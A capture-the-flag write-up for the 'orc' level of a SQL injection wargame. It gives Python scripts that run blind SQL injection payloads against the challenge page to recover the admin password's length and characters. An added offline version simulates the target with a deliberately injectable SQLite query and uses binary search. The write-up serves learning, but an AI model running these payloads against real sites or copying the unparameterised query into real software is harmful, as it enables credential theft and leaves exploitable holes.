The challenge also checks that the submitted pw is the real pw, so getting a row back is not enough: the password itself has to be recovered.
It was a blind injection problem: the only feedback the page gives is whether the injected query returned a row ("Hello admin").
First, to find the length, I used the code below.
import requests

url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}  # the author's logged-in LOS session

# Blind length probe: the page only reveals whether the injected query returned a row,
# so test length(pw)=i for each i and watch for the "Hello admin" banner.
for i in range(20):
    rs = requests.get(url + "?pw=1234' || id='admin' and length(pw)=" + str(i) + " -- -",
                      headers=headers, cookies=cookies)
    text = rs.text
    if "<br><h2>Hello admin</h2>" in text:
        print(str(i) + " find it")
Once the length was known, I happily brute-forced it character by character.
import requests

url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php"
headers = {'User-Agent': 'Mozilla/5.0'}
cookies = {'PHPSESSID':'qfr7dlp9t9g1nat81riiigb065'}  # the author's logged-in LOS session

# Per-character extraction for the 8-character pw: at each position j+1, try every
# printable ASCII code until the one that brings back "Hello admin", then move on.
for j in range(8):
    for i in range(33, 125):
        rs = requests.get(url + "?pw=1234' || id='admin' and ascii(substr(pw," + str(j+1) + ", 1))=" + str(i) + "-- -",
                          headers=headers, cookies=cookies)
        text = rs.text
        if "<br><h2>Hello admin</h2>" in text:
            print(str(j) + " " + chr(i) + " find it")
            break
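The two scripts above need up to 92 requests per character because they test `ascii(substr(pw,N,1))=i` one value at a time. The following is an added example, not code from the write-up: it runs the same length-then-character extraction offline against a simulated target (an in-memory SQLite table standing in for `prob_orc`, with a constructed secret, since the real password is not on this page) and replaces the linear scan with a binary search over a `>` predicate, about 7 requests per character. Two assumptions worth stating: the simulated query has the shape `select id from prob_orc where id='admin' and pw='<input>'`, and the payload spells out `or` instead of `||`, because SQLite treats `||` as string concatenation while MySQL treats it as OR, so `or` is the portable form.

```python
import sqlite3

# Constructed stand-in for the admin password; the real orc pw is not on this page.
SECRET_PW = "x9Ab_2zQ"


class SimulatedOrc:
    """Offline stand-in for the challenge page (assumption: the backend runs
    select id from prob_orc where id='admin' and pw='<input>' and prints
    "Hello admin" when a row comes back). It exposes exactly one bit per
    request, which is all a blind injection gets."""

    def __init__(self, secret=SECRET_PW):
        self.conn = sqlite3.connect(":memory:")
        # MySQL has ascii(); SQLite does not, so register an equivalent.
        self.conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
        self.conn.execute("create table prob_orc(id text, pw text)")
        self.conn.executemany("insert into prob_orc values (?, ?)",
                              [("guest", "guest"), ("admin", secret)])
        self.queries = 0  # request counter, to compare search strategies

    def hello_admin(self, pw_param):
        self.queries += 1
        # Deliberately unparameterised: this is the injectable query.
        sql = f"select id from prob_orc where id='admin' and pw='{pw_param}'"
        row = self.conn.execute(sql).fetchone()
        return row is not None and row[0] == "admin"


def find_length(oracle, max_len=64):
    """Linear scan like the write-up's first script (one query per candidate)."""
    for n in range(1, max_len + 1):
        if oracle(f"1234' or id='admin' and length(pw)={n} -- -"):
            return n
    return None


def find_char(oracle, pos, lo=32, hi=126):
    """Binary search over printable ASCII with a '>' predicate: each query
    halves the remaining range, so at most 7 queries per character."""
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"1234' or id='admin' and ascii(substr(pw,{pos},1))>{mid} -- -"):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_pw(oracle):
    """Full blind extraction: length first, then one character per position."""
    length = find_length(oracle)
    if length is None:
        raise RuntimeError("pw length not found within max_len")
    return "".join(find_char(oracle, pos) for pos in range(1, length + 1))


if __name__ == "__main__":
    target = SimulatedOrc()
    pw = extract_pw(target.hello_admin)
    print(f"pw={pw!r} after {target.queries} queries, verifies: {target.hello_admin(pw)}")
```

Because `ascii()` returns the exact byte value, the extracted string preserves case even where the database compares strings case-insensitively, which matters when the recovered pw is then submitted as the final answer.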